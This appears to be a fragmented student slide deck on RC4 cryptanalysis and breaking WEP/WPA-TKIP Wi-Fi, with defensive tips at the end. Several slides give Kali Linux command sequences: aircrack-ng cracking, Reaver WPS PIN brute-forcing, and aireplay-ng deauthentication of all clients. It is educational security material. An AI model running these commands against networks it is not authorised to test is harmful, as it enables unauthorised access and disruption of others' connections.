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39c407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39c407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39c407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39c407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8fd3d71f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8fd3d71f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8fd3d71f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8fd3d71f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8fd3d71f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8fd3d71f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8fd3d71f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8fd3d71f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39c40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39c40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739c40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739c40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39c407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39c407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39c4075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39c407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8fd3d71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8fd3d71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39c407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39c407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39c407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739c407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739c4075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739c407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8fd3d71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8fd3d71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8fd3d71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8fd3d71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8fd3d71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8fd3d71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8fd3d71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8fd3d71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8fd3d71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8fd3d71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8fd3d71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48fd3d7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8fd3d71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8fd3d71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bSw6PlA8aGy7exajkFhthj8dnA9PNZMg/view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Message_Integrity_Check" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cyclic_redundancy_chec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BHRD0HYXuejA1CghttizmDVtOaDNNbzk/view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EsyvVXtHQ7Ezzil6KTxyXg9PcgkWIlts/view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qdVuGbEYldZv5SzmJpNIO-rih04iQSlb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Keystrea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9750" y="624950"/>
            <a:ext cx="798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Cryptanalysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2500"/>
              <a:t> of RC4 and Breaking WEP/WPA-TKIP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02900" y="1736150"/>
            <a:ext cx="8520600" cy="27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Sirjeet Man Tamrakar (AP17110010126)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Gaurav Dahal (AP17110010128)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Ashim Chaudhary (AP17110010134)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575775" y="59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using Packet Capture file(.cap)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61200" y="1350850"/>
            <a:ext cx="81891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STEPS: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airodump-ng {interface name ex:wlan0mon}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Monitor mode enabled interface name)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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irodump-ng  -c  {channel}   --bssid{BSSID}  - w  {desired filename to save}   {</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>interface name</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}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 new terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: aireplay-ng  -1  0  -a  {BSSID}   {interface name}   (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Request)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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ireplay-ng  -3  -b  {BSSID}  {interface}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 new terminal: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aircrack-ng {filename example: attack.cap}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891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7" name="Google Shape;147;p23" title="WEP-aircrack-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500" y="1329275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52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for WEP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39250" y="1328925"/>
            <a:ext cx="7452000" cy="3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Several researchers proposed a fatal vulnerability of WEP.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Finally, WPA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replaces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 WEP in 2004.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571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5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WPA-TKIP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73375" y="1372825"/>
            <a:ext cx="84306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Wi-Fi Protected Access Temporal Key Integrity Protocol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Data Integrity Provided through MIC (Message Integrity Code)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WEP used a 64-bit or 128-bit encryption key that must be manually entered on wireless access points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whereas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TKIP employs a per-packet key, meaning that it dynamically generates a new 128-bit key for each packet and thus prevents the types of attacks that compromised WEP.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WPA also includes a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Message Integrity Check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, which is designed to prevent an attacker from altering and resending data packets.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This replaces the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cyclic redundancy check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(CRC) that was used by the WEP standard.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CRC's main flaw was that it did not provide a sufficiently strong data integrity guarantee for the packets it handled.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50200" y="49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Attacks on WPA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63600" y="1317950"/>
            <a:ext cx="86280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marR="16150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As far as we know, “the key recovering attack against WPA-TKIP” can not be executed in a realistic environment. However, “the falsification attack against WPA-TKIP” can be executed in a realistic environment.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="171450" marR="16150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171450" marR="16150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171450" marR="16150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171450" marR="16150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marR="16150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The Beck-Tews Attack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marR="16150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The Qos Forgery Attack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marR="16150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The Reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ChopChop</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack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699625" y="263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Cryptanalysis of WPA using Kali Linux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89125" y="1439950"/>
            <a:ext cx="79992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495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Reaver(WPS Attack)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92350" y="1328900"/>
            <a:ext cx="7853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First we should make Wifi Interface in Monitor mode.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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ash -i wlan0mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (wps locked or not?)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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eaver  -c10   -b   01:23:45:67:89:AB  -vv  -i   wlan0mon  -K   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1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First, it will catch WPS PIN then will crack WPA (PSK).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to be secure from WPS Attack?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WPS (On/Off).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 testing on your wifi or Simply discard routers having WPS configuration.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125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672275" y="1403400"/>
            <a:ext cx="77460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 title="REAVER_KAL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700" y="15598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630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Deauthentication Attack or DoS Attack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81950" y="1306950"/>
            <a:ext cx="7836300" cy="3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STEPS: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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irodump-ng   wlan0mon   --bssid   D4:6E:0E:4B:57:B2  --channel 10 (N/w details with Clients List)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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ireplay-ng   -0  10   -a  {ACCESS POINT BSSID}  -c  {TARGET MAC ADDRESS}  wlan0mon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a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ireplay-ng   -0   10   -a{Access point} wlan0mon  ---&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deauthenticate</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> all clients that are connected.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airodump-ng   wlan0mon   --bssid   D4:6E:0E:4B:57:B2  --channel 10   -w   capture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aircrack-ng    root/capture01.cap  -w   /usr/share/wordlists/rockyou.txt.gz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06300" y="1306950"/>
            <a:ext cx="82767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Deauthentication										Handshake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7" name="Google Shape;197;p31" title="Deaut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00" y="2007375"/>
            <a:ext cx="3772900" cy="26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title="Handshake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50" y="2007375"/>
            <a:ext cx="4443150" cy="2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9200"/>
            <a:ext cx="76887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							</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3300"/>
              <a:t>RC4</a:t>
            </a:r>
            <a:endParaRPr sz="33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17925"/>
            <a:ext cx="8041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Cipher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key Encryption Algorithm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KSA and PRGA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02700" y="1350850"/>
            <a:ext cx="77154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Beside these, there are many penetration testing tools that comes with Kali Linux such as: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Hashcat, Wifite, John The Ripper, Fern Wifi-Cracker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, and many more…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These tools are really helpful for testing one’s own network and act accordingly to make it secure.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953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Secure WPA?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29450" y="1350850"/>
            <a:ext cx="76887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There are different ways that one can secure WPA-TKIP Secure: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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MAC Filtering or MAC Authentication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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hiding ESSID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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Router Login Credentials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Turning off DHCP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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Activating Firewall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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lengthy and Strong Key will be difficult to crack.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542850" y="4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542850" y="1274000"/>
            <a:ext cx="78753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So, we have done </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cryptanalysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on WEP and WPA-TKIP and analyzed the techniques to make one’s network more secure.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WPA2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> came in to picture in July 29, 2004 which uses </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> algorithm.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AES is far more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> than RC4 which WEP and WPA-TKIP used. AES is so powerful that it is still used by many industries having faster encryption speed.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313825"/>
            <a:ext cx="8331701" cy="44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94100" y="4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950" y="794550"/>
            <a:ext cx="5197000" cy="4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61200" y="517325"/>
            <a:ext cx="821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/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> in Rc4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61200" y="1383800"/>
            <a:ext cx="82110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Especially vulnerable when the beginning of the output </a:t>
            </a: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keystream</a:t>
            </a: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not discarded, or when nonrandom or related keys are used.</a:t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Applications of RC4:</a:t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WEP (More Vulnerable)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WPA-TKIP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905075" y="45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WEP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68375" y="1274025"/>
            <a:ext cx="81621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Wired Equivalent Privacy (security protocol for IEEE 802.11)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" marR="93718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Uses a data encryption scheme that is based on a combination of user-and system-generated key values.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WEAK IV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The IV is too small and in cleartext.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IV is static.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr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IV makes the key stream vulnerable.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="9144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IV is a part of the RC4 encryption key.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95325" y="506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ATTACKS ON WEP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207100"/>
            <a:ext cx="7688700" cy="21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KLEIN’S ATTACK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PTW ATTACK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FMS ATTACK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CHOPCHOP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ATTACK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Variety of DoS Attack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98625" y="736150"/>
            <a:ext cx="81528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Cryptanalysis of WEP using KALI LINUX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84350" y="-8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makeivs-ng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25" y="494675"/>
            <a:ext cx="7600875" cy="44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